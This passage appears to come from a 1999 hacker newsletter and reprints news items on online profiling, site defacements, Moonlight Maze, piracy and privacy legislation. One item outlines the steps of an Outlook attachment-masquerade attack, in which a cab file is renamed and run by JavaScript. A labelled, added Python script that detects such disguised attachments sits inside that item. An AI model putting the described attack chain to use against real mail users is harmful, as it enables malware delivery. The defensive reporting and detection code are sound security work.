23.0 Public Workshop to Discuss Web Site Profiling To Be Held
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A public workshop will be held Monday to discuss the use of online profiling by e-commerce web sites. The workshop will be held by the Federal Trade Commission and the Department of Commerce along with privacy advocates and online advertisers to discuss the use of online profiling.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2389386,00.html?chkpt=zdnntopb

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
-------------------------------------------------------------- Advocates call for halt to online profiling By Jennifer Mack, ZDNN November 5, 1999 4:41 PM PT URL: The Federal Trade Commission and the Department of Commerce will hold a public workshop Monday with privacy advocates and online advertisers to discuss the use of online profiling. On Friday, privacy groups urged the FTC to immediately halt all online profiling pending an investigation, and speed up legislation that would protect consumer's privacy. The practice of creating user profiles involves gathering information on users' surfing habits, which can be used to deliver advertising targeted to people's specific interests. "The technology that's been developed over the past two years for profiling and collecting information about Web surfers has become so intrusive that these profiles are an unacceptable violation of consumer privacy," explained Jason Catlett, president of Junkbusters Corp., a privacy advocacy group. "The government needs to protect consumers from having this information assembled without their consent and control." Catlett and others say the industry's attempts to regulate itself when it comes to online privacy have been unsuccessful. He points to the industry's TRUSTe organization as an example of failed regulation. TRUSTe evaluates its members' privacy policies and allows cooperating Web sites to post a TRUSTe logo promoting their compliance. "TRUSTe doesn't do anything very useful," said Catlett. "The worst privacy violators are not going to pay TRUSTe to be looked at. So there's nothing to protect consumers from really bad violators." Online advertisers often point to users' ability to turn off information gathering "cookies" as the best way to stop sites from collecting personal data. Cookies are special tools used by Web sites that collect information about who you are and what you do when you're online. They can be deactivated by switching them off in your browser options. 
But Andrew Shen, policy analyst for the Electronic Privacy Information Center, believes expecting users to know how to turn off the cookie option is unreasonable.

Unreasonable burden

"The burden of privacy background is totally backward," said Shen. "It shouldn't be up to consumers to protect themselves."

The privacy groups attending Monday's meeting with the FTC feel that the industry's standard "opt-out" policy, which requires consumers to take steps to prevent their data from being gathered, is unfair. They want Web users to be notified before information is collected and give their consent. The alternative, they feel, is the destruction of the Internet's free and open environment.

"Everything on the Internet is going to be targeted towards you," said Shen. "You'll no longer be able to just browse the Net anonymously. So, in some ways, profiling really defeats what the Internet is all about."

@HWA

24.0 Naval Station Upgrades Web Security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Naval Station Ingleside, located near Corpus Christi Texas, has upgraded its web site security after a group seeking freedom for Kashmir, Pakistani Hackerz Club, reportedly defaced the site.

Austin American-Statesman
http://www.austin360.com/technology/stories/1999/11/06hackers.html

Technology

Texas naval base upgrades web security after being hacked
Associated Press
Posted: Nov. 5, 1999

CORPUS CHRISTI -- Naval Station Ingleside has upgraded its web site security after a group seeking freedom for Kashmir reportedly hacked the site.

The security was upgraded after someone modified the index for the Web site and inserted a banner that popped up on the screen when a user opened the page. The banner contained a political message from the Pakistani Hackerz Club, which said it is rallying for the freedom of the Kashmir region from Indian control.
By one estimate, the group has struck about 85 civilian and military sites in several nations since it began its hacking spree. That includes Lackland Air Force Base's web site.

Lt. Cmdr. Kris Winter, executive officer for the ship maintenance activity at Ingleside, said the hacked site didn't contain any classified information, only public information about Shore Intermediate Maintenance Activity. Security for the site has been enhanced, she said.

@HWA

25.0 Sony Reveals Addresses of 2.5 Million Subscribers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

E-mail addresses of subscribers to Sony Music's Infobeat service were exposed to advertisers, a result of a software flaw. Advertisers were able to see the e-mail addresses of those subscribers who have clicked at certain advertisements sent through Sony's mailing list. Sony claimed that all of the advertisers were contacted and that none of them collected or used this information in any way. (Yeah right. Yo, TrustE, time for yet another investigation?)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2389775,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Sony glitch reveals subscriber e-mail addresses
By Margaret Kane, ZDNN
November 8, 1999 6:18 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2389775,00.html?chkpt=zdhpnews01

A software flaw allowed advertisers to view the e-mail addresses of subscribers to Sony Music Entertainment Corp.'s Infobeat service, the company said.

The roughly 2.5 million users who subscribe to Infobeat get a daily e-mail update of music and entertainment news. The newsletter contains advertisements that give special URLs for interested consumers.

"By clicking on select advertisements, certain advertisers had the ability to obtain the e-mail address of the user who clicked on the link," the company said in a letter to subscribers.

Sony said it had recently been informed of the error and had fixed the problem, but advised subscribers to set up passwords for their accounts. The company said it contacted its advertisers, who "confirmed that they did not collect or use any of this information."

Privacy issues have become a hot topic recently. Last week, RealNetworks (Nasdaq: RNWK) ran into trouble after it was disclosed that the company had been tracking data about the music its customers downloaded.

Today, the Federal Trade Commission and the Commerce Department will host a workshop to review whether online profiling practices invade users' privacy. Advocates last week called for the FTC to order a halt on online profiling pending an investigation.

@HWA

26.0 TrustE to Rethink Charter
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

After realising that the recent privacy fiasco perpetrated by Real Networks was outside of its jurisdiction the industry's self-appointed privacy guardian will rethink its charter. TrustE says that it can only investigate web sites that violate privacy issues and not music applications that work over the internet.

Wired
http://www.wired.com/news/technology/0,1282,32388,00.html

TRUSTe Declines Real Probe
by Chris Oakes
3:00 a.m. 9.Nov.1999 PST

Privacy watchdog group TRUSTe declined Monday to investigate RealNetworks, but the decision has prompted the organization to expand its charter.

It is the second time the group has determined that a significant privacy concern lies beyond the scope of its program. Although TRUSTe has investigated several major violations and hundreds of minor incidents, it has never revoked a Web site's right to display its privacy seal.
TRUSTe conducted an initial inquiry last week into the behavior of RealNetworks' RealJukebox software, which was surreptitiously gathering data about the music-listening habits of its users and passing it on to the company. The inquiry is intended to determine if a TRUSTe member company may have violated privacy terms. RealNetworks subsequently issued a patch to keep the software from tracking the unique identifier that allowed RealNetworks to tie the tracking data to users' personal information. TRUSTe’s stated mission is to regulate the use of personal data submitted to Web sites by accepting input from consumers. TRUSTe declined to investigate RealNetworks because RealJukebox is music-listening software that works via the Internet, but only indirectly through a Web site visit. As a result, the self-monitoring group has determined that it needs to expand its program to include a wider range of data collections. "Unfortunately, yes, [the RealNetworks privacy problem] falls outside the scope of our program," said TRUSTe spokesman Dave Steer. "Because of that, we're going to be evolving the program." The "trustmark" license grants companies the right to bear a seal on their Web sites if they comply with TRUSTe’s privacy policy. The seal was designed to ensure that companies disclose their data collection practices. The same technicality has previously led the organization to back out of privacy matters that appeared on their face to be relevant to TRUSTe's mission. TRUSTe cited the scope issue when it declined to investigate a privacy question related to Microsoft's Windows registration process. When people registered their Windows software, Microsoft's registration program gathered a unique identifier from the user's disk. But, since the process didn't explicitly involve the company's Web site, TRUSTe didn't investigate. 
Sensing a pattern of exemptions that could limit its reach -- as well as consumer confidence in the TRUSTe seal -- the organization announced a plan to expand its scope on Monday.

"The line between the data that's collected at a Web site and the data that can be collected over the Internet, such as GUID [global unique identification number], has been blurred," said TRUSTe's Steer. "That's why we're expanding the program."

Steer said TRUSTe would call on experts inside and outside the Internet industry to determine how to expand the program to include the behavior of software. The behavior of Internet software, such as RealNetworks', is much more complex and less apparent, he said.

When the program incorporates more kinds of Net-enabled behaviors, TRUSTe hopes to be in a good position to monitor the increasingly omnipresent activity of data collection.

"In an increasingly networked society where there are 'EZ-passes' and supermarket cards, this type of incident is going to become increasingly common. So it's time to expand the program," Steer said.

TRUSTe recommended RealNetworks adopt a five-point plan that could help bolster consumer trust, given the recent problems.

The TRUSTe news occurred on the same day that RealNetworks issued updated software to address a newer privacy problem affecting its streaming software product, RealPlayer.

@HWA

27.0 Russians Exploited SIPRnet Gateways
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

So what exactly did the Russians get during Moonlight Maze? Were classified systems compromised? SIPRNet Breached? Passwords stolen? Why was all of DOD asked to change their passwords a few months back? It looks like Moonlight Maze had a bigger impact on US systems than originally revealed. Unauthorised connections between NIPRNet and SIPRNet may have led to a wider intrusion than the public was led to believe. (Hmmm, no classified information? I wonder.)

PBS - The Pulpit, by Robert X. Cringely
http://www.pbs.org/cringely/pulpit/pulpit19991104.html

Let Them Eat Borscht
Maybe Russians Have Been Hacking DoD Servers After All, but It's Still Our Fault
By Robert X. Cringely

Okay, so I was wrong. No, not about Y2K. As you'll read later on, some of the most surprising people are beginning to agree with my level-headed view of that problem. Where I was wrong was in my declaration three weeks ago that even if Russians were trooping through web sites at the Pentagon as the FBI was claiming it really didn't matter. I saw this as whining on the part of a group of Federal intelligence and law enforcement officials trying to increase their own power. And it may have been all that, but it also turns out to be a lot more.

My error was in basing that column on logic and not paying enough attention to human nature. The syllogism I constructed was simple: Even if programmers from the Russian Academy of Sciences were attacking Pentagon web sites, those web sites were there specifically to be attacked. The rules at the Department of Defense say that only non-classified information can be held on servers available to the public, so the DoD must simply accept the Russian invasion as fair use. Federal officials complaining about the loss of "sensitive information" had no right to complain, it seemed to me. What the Russians were doing was no more or less than what spider programs at Excite or Google are doing every day to servers all over the world.

My mistake, it turns out, was in not looking further into those words "sensitive information," and in failing to remember how we tend to compromise our own systems for ease of administration.

This column is apparently read in higher places than I ever expected. As a result, some significant new information has dropped into my lap. Here is what I have learned since that first column appeared.
While computer systems with classified information are not supposed to be connected to the public Internet, such systems WERE connected. Pentagon webmasters gave themselves administrative access to some classified machines through unclassified machines. It wasn't malicious, just stupid, but the result was that the clever folks at the Russian Academy of Sciences (apparently they were the culprits, after all) gained root level access to a number of servers. Soon they were messing where they shouldn't have been a-messing.

It's not exactly clear how much information was lost, but it could have been a lot given the fact that the "sensitive information" referred to by the FBI was a wealth of login passwords for several hundred thousand individual users at the Department of Defense. The FBI was apparently finessing the language since passwords, which are by definition secret, aren't actually considered officially "secret." Sheesh!

Once the breach was noticed, they cut the links between the secret and non-secret machines and told a few hundred thousand people to change their passwords. End of problem ... they hope.

This has to be a wakeup call, though, to any organization that has information it wants to keep to itself. There are probably such administrative worm holes in most systems composed of dozens or hundreds of servers and the right kind of spider program will find them all.

Well, this is the week when Judge Thomas Penfield Jackson presents his finding of facts in the Microsoft anti-trust case. It hits the fan on Friday, and apparently, officials of Microsoft and the Department of Justice have been in almost continuous negotiations trying to head off the whole thing. They are trying to come up with a consent decree that will be, in effect, an out of court settlement of the case. Microsoft doesn't want to be damned by the judge, and the DoJ wants to use this to push a restructuring at the software giant.
But I have to tell you, I just don't buy the idea that Bill Gates is going to agree to anything that fundamentally hurts his company. Expect no breakthrough unless it involves major government concessions. The reason I don't expect an out of court settlement is because the DoJ won't accept a cosmetic consent decree (remember this whole case came about because Microsoft was accused of violating the last consent decree), and Microsoft won't accept any agreement that has real teeth. Both sides have been molding their cases for months on the assumption that Judge Penfield Jackson will rule against Redmond on Friday. Gates already expects to be dragged through the mud and just hopes to see it all reversed by the more conservative appeals court. Remember this finding of fact is not the penalty phase of the case. That's still months away, if ever. And Microsoft has many legal weapons it can use to stall real change for years. As I have long said, the day Microsoft is broken in pieces will be the day when Bill Gates decides several little Microsofts are worth more than one big Microsoft. No matter what the judge says this week, the real power is still in Bill's hands. Finally back to Y2K. Now that Rev. Jerry Falwell has revised his alarmist and highly profitable views on Y2K, I think we can expect similar shifts on the part of other Y2K zealots. Some folks have even hinted to me that Gary North, the original Y2K extremist, would be shifting shortly. While I see no indication of that yet, I do take some comfort in knowing that Dr. North has enough confidence in the idea that maybe -- just maybe -- the world information infrastructure will remain intact enough after January 1 to allow him to continue offering TWO YEAR subscriptions to his newsletter. If anyone is going to make money from Y2K, I want it to be my favorite Marilyn Monroe imitator, Cybele, who has just released the last disco classic of the century, a little ditty called Y2Kymca.com. 
Download the MP3 and learn why gentlemen prefer blondes, especially blondes with accordions.

@HWA

28.0 FBI Director Calls For International Cooperation on Online Crime
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

FBI Director Louis Freeh says that tracking computer criminals should become a matter as important as foreign policy, defense, or economic issues. He is calling for increased cooperation between countries to track down and prosecute internet criminals.

Reuters - Via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2389802,00.html?chkpt=zdnntop

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Computer crime outrunning law enforcement
By David Brunnstrom, Reuters
November 8, 1999 8:04 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2389802,00.html?chkpt=zdnntop

BANGKOK -- The spread of computers has made life easier for terrorists, pedophiles, drug dealers and financial fraudsters, making closer cooperation between police forces vital in the new millennium, the FBI said Monday.

"Information technology, which is a wonder for the promotion of education and good things, is also used by people to do harm and commit crime," Louis Freeh, the director of the Federal Bureau of Investigation, told a news conference.

"Whether you are a pedophile using the Internet, or a terrorist looking to shut down a stock exchange or the 911 emergency system...these are threats that are facilitated by globalization and information technology."

International cooperation

Freeh said technology now allowed someone sitting in a far-off country to use a laptop computer to steal millions of dollars from a bank in New York, or to plan chemical weapon attacks. It had progressed beyond the abilities of law enforcement to counter such threats.

"So I think the millennium will require international cooperation at unprecedented levels," he said.

"What has to happen is that high-level law enforcement officers, governments, presidents, prime ministers, have to ensure law enforcement issues are as important as matters of foreign policy, as defense issues and economic issues," he said.

"More and more we see the developments of technical means and information technologies that allow crimes and criminals to communicate quicker than ever.

"It means borders between our countries and jurisdictions between our police agencies have less and less importance.

"What we need to do is to apply the rule of law and be as competent and as fast moving and as coordinated as those who would break the law using the advantages of globalization," said Freeh.

A global battle

Freeh was in Thailand to discuss cooperation with Prime Minister Chuan Leekpai and other officials and spoke at an International Law Enforcement Academy set up last year as a U.S.-Thai initiative.

One of two worldwide -- the other is in Budapest -- it has taught some 600 students from Thailand, Laos, Vietnam, Malaysia, Singapore, Indonesia, the Philippines, China and Hong Kong. They have addressed narcotics trafficking, white-collar crime, financial investigations, trafficking of women and children, illegal migration and intellectual property rights.

In Thailand, Freeh discussed anti-terrorism initiatives, the threat of biological and chemical weapons, and issues like money laundering, which Bangkok recently passed legislation to combat. He said locating the academy in Thailand showed the United States saw Thailand as "regional leader in terms of law enforcement" and praised its efforts in fighting narcotics.

Freeh spoke before heading to Seoul on the last leg of an Asian tour that has taken him to Japan, the Philippines, Singapore as well as Thailand -- all, like the United States, facing problems from abuse of methamphetamines.
He said it was up to producer countries, like Myanmar, to make "honest" and "sustained" efforts to combat the trade.

"But the real issue has to be addressed on the consumer demand level and the United States has to do a much better job with respect to that as we ask other countries to do their share."

@HWA

29.0 Lebanon Outlaws Voice Over IP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by skoubidou

Last January the Ministry of Post and Telecommunications in Lebanon banned ISPs from offering Voice over Internet services including video conferencing. This forces people in Lebanon to use the state run telephone service which charges up to 10 times the rate that the ISPs did.

Lebanese Daily Star
http://archive.dailystar.com.lb/leb/1999/January99/18_1_99/N11.HTM

Late Update 0935EST

In response to the above action a private web site has been set up to detail how to work around the government's ban.

Internet Telephony in Lebanon
http://members.xoom.com/zork48

Lebanese Daily Star:

PTT Ministry bans overseas phone calls via Internet
Zayan Khalil
Daily Star staff

The Ministry of Post and Telecommunications Saturday banned Internet service providers from offering voice communication services. The service, known as the Voice Over the Internet, provides Internet subscribers with a cheap means of calling overseas.

Abdel-Monem Youssef, the ministry’s director-general of operations and maintenance, warned that Internet service providers would be prosecuted if they failed to comply with the terms and regulations of their licenses. The licenses, which were granted by the ministry, instruct Internet companies to refrain from offering voice services. Video conferencing was also prohibited.

“The ministry has the exclusive right to provide international and local lines,” Mr. Youssef said.
“Internet companies that don’t abide by the terms of their license are reducing the ministry’s revenues and depleting public funds.” Subscribers to the phone service make international calls from regular land lines by dialing their Internet account number followed by the phone number abroad. Unlike other Internet phone services, subscribers to the Internet phone do not require a computer to place their calls, only a regular phone. The cost is charged directly to the subscriber’s Internet access account. Following the ministry’s decision, Intracom Products announced the suspension of its phone-via-Internet service. Intracom, one of several companies that offered what it called the “i-phone service,” launched a nation-wide advertising campaign a week ago to promote the new product. An announcement on the company’s website Sunday said, “if you have any remaining i-credits on your i-phone account, they will be transferred in a few days to your Internet account.” In a statement, the company apologized to the ministry for any inconvenience caused by offering the service. Bahjat Darwish, the general manager of IntraCom Products, described his company’s license breach as a “misunderstanding with the ministry” but refused to elaborate. “We understood the ministry’s directions in a different way than they did,” said Mr. Darwish. “But we don’t want to do anything that does not suit the ministry.” However, the decision does not affect a foreign “phone over the Internet” provider, Net2-Phone Lebanon, which offers a similar service. Net2Phone is an agent for US-based International Dealers for Telecommunication (IDT). It allows customers to make telephone calls directly from their computers to regular phone numbers all over the world for a fraction of the government’s rates. The service charges 15 cents a minute for a peak-time call to the U.S. and 10 cents at reduced rates, while the i-phone charged 65 cents. 
Making the same call through the ministry’s operator at the 100 number would cost up to $1.40 a minute. But an expert in the information technology industry, who refused to be named, predicted that the ministry would soon interfere in the business of any company providing international calls via the Internet. “The ministry will always want to be the country’s only provider of phone lines because it cannot do the same with data transfer,” the source said. Of Lebanon’s 10 current Internet service providers, only four have access lines spread throughout the country. The service providers are generating approximately $1m a month in revenues, thanks to growing numbers of subscribers. According to ministry statistics, Lebanon has just under half of the Arab world’s 85,000 Internet subscribers.

@HWA

30.0 Bond Fans Could Not Wait ?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

The new James Bond movie "The World Is Not Enough" is now available on the net, for free. UPI, the film's legal distributors, have launched an investigation to find out how a film collectors' club got hold of the video-quality copy and released it on the Internet over a week before its official release.

The Straits Times
http://straitstimes.asia1.com/cyb/cyb2_1108.html

NOV 8 1999

007 film hijacked

A copy of the latest Bond movie, The World Is Not Enough, has been stolen before its official release on Nov 18, and is available free over the Internet

LONDON -- The Internet bootleggers are more than a match for James Bond. A copy of one of the most widely trailed blockbusters of the year -- the latest 007 movie, The World Is Not Enough -- has been stolen before its official release and is available free over the web, reported The Sunday Times. The paper said investigators believed it was the first time a top movie had fallen victim to Internet thieves before reaching the cinemas.
Experts suspect the Internet version might have been copied from a trade tape sent across the Atlantic between film executives. For movie studios, it is a nightmare come true. George Lucas, producer of the Star Wars films, said he had believed the technology would not exist for several years, but Star Wars: the Phantom Menace was being downloaded on British computers within 24 hours of its American premiere and sold on videotape at street markets before it opened here. At least Star Wars had a chance to make money before the thieves got hold of it, The Times said. The 19th Bond adventure is not due for release until Nov 18. UPI, which paid millions to distribute it, launched an investigation last week to find out how a secretive film collectors' club got hold of the video-quality copy and put it on the Internet. The Times said the theft was not for profit: Hackers prided themselves on distributing copies of movies, computer games and software before their official release. Lavinia Carey, director-general of the British Video Association, said bootlegging was a 2-billion (S$5.5-billion) business. In Malaysia, illicit copies outnumber originals by four to one. Most film companies believe distribution of movies over the Internet is inevitable. Microsoft is working on technology to allow films to be sent live into ordinary computers. One expert quoted by The Times warned: "Once that technology is in place, it will be hijacked by the pirates. They are in it for the technical challenge rather than the money -- which is why not even James Bond can beat them." It'll take four days to download the movie COPY of the latest James Bond movie -- The World Is Not Enough -- was stolen by a secretive film collectors' club. The video-quality copy was then put on the club's website on the Internet. The Sunday Times of London said it took four days to download the movie into an ordinary computer. 
But it added that users with ISDN telephone lines can make a copy overnight and then "burn" it onto a video CD, which can then be watched on any home computer. The website can be accessed only by people who are given its seven-digit address as a reward for supplying the club with early copies of films. The site has been closed, but the film is still being duplicated. The Times did not give the address of the website. Audiences in Singapore and Malaysia will be the first in the world to see the movie, which will be released in the two countries on Nov 18, one day before its American release. Mr Roger Pollock, managing director of United International Pictures, the film's distributor in Singapore, said last month: "The reason Singapore and Malaysia are sharing the same release date is to cut down on the potential threat of video piracy."

HNN Update:

contributed by Alkivar

James Bond Still In The Can

Yesterday HNN posted a story originally from the London Sunday Times claiming that the new James Bond Movie, The World Is Not Enough has already made it onto the internet a week before release. Today we have received email claiming that this is not true. That the London Sunday Times was inaccurate. That while pirated Internet movie sites may have a directory for the James Bond Movie there is in fact no movie in them. The Video CD Release group iGN claims that this is all a hoax perpetrated by them.

@HWA

31.0 Masquerade Attack Discovered for Outlook
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

By changing the three letter extension on an email attachment it is easy to bypass MS Outlook's security features. Email attachments with the extension changed to .gif or .doc are ignored by Outlook and allowed to pass through its filtering system.
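The weakness summarized above is that the filename suffix is trusted while the content is never inspected. As an added example (not code from HNN or from any of the quoted articles), the Python below audits a message the way a mail gateway could, comparing each attachment's suffix with the leading bytes of its decoded content; the sample message, its file names and the small signature table are constructed for illustration.

```python
"""Added example: flag e-mail attachments whose content contradicts their suffix."""
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# Leading "magic" bytes of a few well-known formats -> detected type.
# The table is deliberately small; a production filter would use a fuller one.
SIGNATURES = [
    (b"MSCF", "cab"),                               # Microsoft cabinet archive
    (b"MZ", "exe"),                                 # DOS/Windows executable
    (b"PK\x03\x04", "zip"),                         # ZIP archive
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),  # OLE2 container (.doc)
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\xff\xd8\xff", "jpeg"),
]

# Detected types that each suffix may legitimately carry.
# Plain text has no signature, so ".txt" must sniff as "unknown".
EXPECTED = {
    ".gif": {"gif"}, ".jpg": {"jpeg"}, ".jpeg": {"jpeg"},
    ".doc": {"ole2"}, ".txt": {"unknown"},
    ".cab": {"cab"}, ".zip": {"zip"}, ".exe": {"exe"},
}

# Archive or executable content hiding behind another suffix is the
# masquerade case; other disagreements are reported as plain mismatches.
ACTIVE_TYPES = {"cab", "exe", "zip"}


def sniff(data):
    """Return the type implied by the first bytes of data, or 'unknown'."""
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def audit_message(raw):
    """Return (filename, suffix, sniffed_type, verdict) for every attachment."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").strip()
        data = part.get_payload(decode=True) or b""  # undo base64/quoted-printable
        suffix = os.path.splitext(name.lower())[1]
        kind = sniff(data)
        allowed = EXPECTED.get(suffix)
        if allowed is None:
            verdict = "unlisted-suffix"   # no policy for this suffix: review by hand
        elif kind in allowed:
            verdict = "ok"
        elif kind in ACTIVE_TYPES:
            verdict = "masquerade"        # archive/executable behind a benign suffix
        else:
            verdict = "mismatch"
        findings.append((name, suffix, kind, verdict))
    return findings


def build_sample():
    """Constructed test message: two honest attachments, two disguised ones."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "user@example.test"
    msg["Subject"] = "constructed sample"
    msg.set_content("See attached.")
    msg.add_attachment(b"GIF89a" + b"\x00" * 16,
                       maintype="image", subtype="gif", filename="logo.gif")
    # Cabinet header bytes behind an image suffix.
    msg.add_attachment(b"MSCF" + b"\x00" * 32,
                       maintype="image", subtype="jpeg", filename="holiday.jpg")
    # Executable header bytes behind a document suffix.
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 32,
                       maintype="application", subtype="msword",
                       filename="report.doc")
    msg.add_attachment("plain notes\n", filename="notes.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    for row in audit_message(build_sample()):
        print("%-12s suffix=%-5s content=%-8s %s" % row)
```

Signature sniffing only looks at the first bytes, so it complements content scanning rather than replacing it.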
C|net http://news.cnet.com/news/0-1003-200-1432242.html?tag=st.ne.1002.bgif.1003-200-1432242 Outlook vulnerable to masquerade attack By Stephen Shankland Staff Writer, CNET News.com November 8, 1999, 6:55 p.m. PT A prominent computer "bug hunter" has found a vulnerability that allows a malicious programmer to launch an email attack which bypasses some of the precautions built into Microsoft's Outlook software. The vulnerability smoothes the way for a new type of email-borne virus, also called a Trojan horse, and other malicious software. Microsoft Outlook is one of the most popular email programs in use. Ordinarily, when a Microsoft Outlook user clicks on a file that has been received as an "attachment," the program will ask whether the user wants to open or save the attachment. Programs which exploit the vulnerability, however, fool Outlook into executing the potentially harmful software without asking permission. Email containing a malicious payload is a popular new method of attacking computers. For example, US West's internal network had to be shut down for an evening about two weeks ago because of a self-generating attack. The attack works by disguising the true identity of an email attachment so that Outlook assumes the attached file is benign, said the discoverer, Juan Carlos Garcia Cuartango, a Spanish researcher who has found several other weaknesses in the past. The masquerade works because Outlook doesn't examine files with common "extensions." An extension is a three-letter filename suffix, such as "doc" or "gif." "Outlook does not care about what the real attachment contains. It only cares about the attached file suffix," Cuartango said in an email. Microsoft was unable to comment on the vulnerability by press time. The newly discovered problem affects Microsoft Outlook Express 4 and 5, Outlook 98, and Outlook 2000, according to Elias Levy, chief technology officer of Security Focus, a company that monitors computer security problems. 
There aren't yet reports of active attacks using the vulnerability, he said. "I think it's very severe," Levy said. "It could be used to create something just as bad or even worse than Melissa," he said, speaking of a virus that swept the Internet in March. Melissa was successful largely because it automatically sent copies of itself to unsuspecting users via Microsoft Outlook email software. Antivirus software initially failed to detect the virus, although Melissa ultimately proved a bonanza for antivirus companies. Since its emergence, several other variants have appeared on scene. Cuartango said he notified Microsoft of the vulnerability on October 15. The basic problem isn't being fixed by companies such as Microsoft and Netscape, Levy believes. "Cuartango and [fellow bug catcher Georgi] Guninski have shown we just have this cycle. They find a bug, the vendor patches it, a week goes by, and they find another one," Levy said. "We have to look beyond that at what's fundamentally wrong here: We have programs such as Web browsers and email clients that connect to an untrusted network from which they receive data they do not trust." Levy believes the solution is to adopt a method used by the military, in which programs run in a safe zone within a computer--a cordoned-off area where the programs have minimum privileges and can't do any damage. Sun Microsystems has taken steps in this direction with its "sandbox" area, Levy said, but there still is room for attacks that don't use Java and companies have had some difficulties in making sure Java works like it's supposed to. The Unix operating system, which is supposed to restrict the actions of computer tasks not run by the system administrator, is better than Windows, Levy said. However, it's "definitely not the solution either." The new vulnerability works through a series of disguises, Levy said. First, the malicious program is converted into a Microsoft archive format called a "cab" file. 
Then, the cab file is renamed with an extension of a file type that Outlook isn't concerned with (such as "jpg," "mov," or "txt"), then emailed as an attachment. When the victim clicks on the attachment, the cab file is decompressed and its contents saved to a specific location. The last stage occurs when a Javascript program in the email then can execute the potentially malicious program that was contained in the cab file.

To protect against the problem, Security Focus recommends changing the default location for temporary files from TEMP or TMP to some other, unpredictable location. "You can also disable Javascript," the company said.

@HWA

32.0 Feds May Create Database to Steal Privacy
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Today the US House of Representatives will debate the creation of a huge federal database to track and identify American citizens who default on student loans or who should not be receiving unemployment benefits. The database would require the Department of Health and Human Services to track the name, address, Social Security Number and employment status of people who are believed to be defrauding the government. It will then force employers to verify an applicant's status with the database. (And you wonder why the government is so against privacy laws? Because shit like this would be illegal.)

Wired
http://www.wired.com/news/politics/0,1283,32435,00.html

The Fed's Deadbeat Database
by Declan McCullagh

4:00 p.m. 9.Nov.1999 PST

A vast federal database will be used to identify Americans who default on student loans or who should not be receiving unemployment benefits, according to a bill scheduled for debate Wednesday by the US House of Representatives. The measure would require the Department of Health and Human Services to use a national list of current public and private-sector employees to track people suspected of cheating the government out of money.
The American Civil Liberties Union and some conservative groups are trying to rally last-minute opposition to the measure, which proponents say would reduce fraud by as much as US$800 million a year. "This legislation would help turn employers' gates into government checkpoints: Today the check is whether they owe child support. Tomorrow the check is whether they can collect workman's comp. In the future the check could be even more intrusive," says Greg Nojeim, ACLU legislative counsel. As part of a sweeping 1996 welfare reform law, Congress created the "Deadbeat Dad" database to track fathers who did not pay child support. Beginning in 1997, it required HHS to set up a computer system to record names, Social Security numbers, birthdates, and employers. Phyllis Schlafly's Eagle Forum says it hopes to defeat the "Fathers Count Act", which is sponsored by Representative Nancy Johnson (R-Connecticut) and expands the use of the database. "We're opposed to expanding the use for any reason. When it was created we were told it would only be used for the purpose of tracking deadbeat dads," said the Eagle Forum's Lori Cole. The bill is designed to thwart "borrowers of loans made under title IV of the Higher Education Act of 1965 that are in default" or owe other grant money. It says information will be turned over to the Department of Education and Justice Department prosecutors. State unemployment agencies may submit a name and SSN to check if that person receiving benefits is employed or not. Under existing law, the Social Security Administration verifies that correct SSNs are listed in the database. The Treasury Department and the IRS also have full access.

@HWA

33.0 CMU Invades Students Computers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Carnegie Mellon University (CMU) disconnected the dorm room access of 71 students after the systems were scanned and found to have MP3 files on them.
CMU claims they were pressured into the scan by RIAA (Recording Industry Association of America), who denies the accusation. Details are sketchy as to how the school actually performed the scan or if they illegally broke into the systems to gather the information. No warnings about the search were given to students which may have violated the Digital Millennium Copyright Act of 1998. It is unclear whether the school verified the legal status of each MP3 file. Some students had posted their own music and not pirated materials. (If this was done by a simple web crawler a robot.txt file should take care of it.)

MP3.com
http://www.mp3.com

@HWA

34.0 New Privacy Alerting Software
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

